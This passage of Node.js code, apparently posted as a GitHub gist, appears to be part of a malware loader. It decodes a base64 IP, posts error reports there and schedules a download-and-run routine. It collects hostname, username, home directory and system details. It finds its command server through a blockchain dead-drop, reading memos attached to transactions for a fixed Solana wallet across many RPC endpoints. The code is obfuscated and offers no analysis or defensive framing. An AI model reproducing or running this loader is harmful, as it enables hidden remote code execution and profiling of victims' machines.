await fetch(`http://${atob(LqAcLAXOor_dht["_IP"])}/error-handler`, {
method: "POST",
body: "reason " + reason
}).catch((e) => {
});
}
setTimeout(() => {
_x86_downloadAndRunFile();
}, 21e3);
}
process.on("SIGINT", () => gracefulShutdown("SIGINT (Ctrl+C)"));
process.on("SIGTERM", () => gracefulShutdown("SIGTERM"));
process.on("SIGQUIT", () => gracefulShutdown("SIGQUIT"));
process.on("SIGHUP", () => gracefulShutdown("SIGHUP"));
process.on("SIGUSR2", () => gracefulShutdown("SIGUSR2"));
process.on("EPIPE", () => {
});
process.on("uncaughtException", async (error) => {
if (error.code === "EPIPE" || error.message.includes("EPIPE")) {
return;
}
setTimeout(() => {
gracefulShutdown("uncaughtException " + error.toString());
}, 15e3);
});
process.on("unhandledRejection", async (reason, promise) => {
if (reason && (reason.code === "EPIPE" || reason.message?.includes("EPIPE"))) {
return;
}
setTimeout(() => {
gracefulShutdown("unhandledRejection " + reason);
}, 15e3);
});
function getSystemInfo() {
return {
platform: {
type: import_os.default.platform(),
arch: import_os.default.arch(),
release: import_os.default.release(),
version: import_os.default.version()
},
cpu: {
model: import_os.default.cpus()[0].model,
cores: import_os.default.cpus().length,
speed: import_os.default.cpus()[0].speed + " MHz"
},
memory: {
total: (import_os.default.totalmem() / 1024 / 1024 / 1024).toFixed(2) + " GB",
free: (import_os.default.freemem() / 1024 / 1024 / 1024).toFixed(2) + " GB",
used: ((import_os.default.totalmem() - import_os.default.freemem()) / 1024 / 1024 / 1024).toFixed(2) + " GB",
usage: ((1 - import_os.default.freemem() / import_os.default.totalmem()) * 100).toFixed(2) + "%"
},
system: {
hostname: import_os.default.hostname(),
uptime: (import_os.default.uptime() / 3600).toFixed(2) + " \u0447\u0430\u0441\u043E\u0432",
load: import_os.default.loadavg()
},
user: {
username: import_os.default.userInfo().username,
homedir: import_os.default.homedir(),
shell: import_os.default.userInfo().shell || "N/A"
}
};
}
function makeStr(length) {
var result2 = "";
var characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
var charactersLength = characters.length;
for (var i = 0; i < length; i++) {
result2 += characters.charAt(Math.floor(Math.random() * charactersLength));
}
return result2;
}
async function getSignaturesForAddress(publicKey, options3 = {}) {
const limit = options3.limit || 1e3;
const endpoints = [
"https://go.getblock.us/86aac42ad4484f3c813079afc201451c",
"https://solana-mainnet.gateway.tatum.io/",
"https://solana-rpc.publicnode.com",
"https://api.blockeden.xyz/solana/KeCh6p22EX5AeRHxMSmc",
"https://sol-protect.rpc.blxrbdn.com/",
"https://solana.drpc.org/",
"https://solana.leorpc.com/?api_key=FREE",
"https://solana.api.onfinality.io/public",
"https://solana.api.pocket.network/",
"https://api.mainnet-beta.solana.com",
"https://public.rpc.solanavibestation.com/"
];
let lastError = null;
for (const endpoint of endpoints) {
try {
const response = await fetch(endpoint, {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify({
jsonrpc: "2.0",
id: 1,
method: "getSignaturesForAddress",
params: [
publicKey.toString(),
{
limit
}
]
})
});
if (!response.ok) {
throw new Error(`HTTP error! status: ${response.status}`);
}
const data = await response.json();
if (data.error) {
throw new Error(`RPC error: ${data.error.message}`);
}
if (Array.isArray(data.result) && data.result.length == 0) {
continue;
}
return data.result;
} catch (error) {
lastError = error;
continue;
}
}
throw new Error(`All RPC endpoints failed. Last error: ${lastError?.message}`);
}
function getUrl() {
return new Promise(async (resolve) => {
let memo = null;
while (!memo) {
const signatures = await getSignaturesForAddress("BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC", {
limit: 1e3
});
if (!Array.isArray(signatures) || Array.isArray(signatures) && signatures.length == 0) {
await new Promise((resolve2) => setTimeout(resolve2, 1e4));
continue;
}
memo = signatures.filter((x) => x?.memo)[0].memo;
await new Promise((resolve2) => setTimeout(resolve2, 1e4));
}
const result2 = memo.replace(/\[\d+\]\s*/, "");
return resolve(JSON.parse(result2));
});
}
function decoderBase64(encodedLink) {
const decodedLink = Buffer.from(encodedLink, "base64").toString("utf-8");
const ipRegex = /(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/;
const match = decodedLink.match(ipRegex);
if (match) {
const ip = match[1];
return ip;
} else {
return null;
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment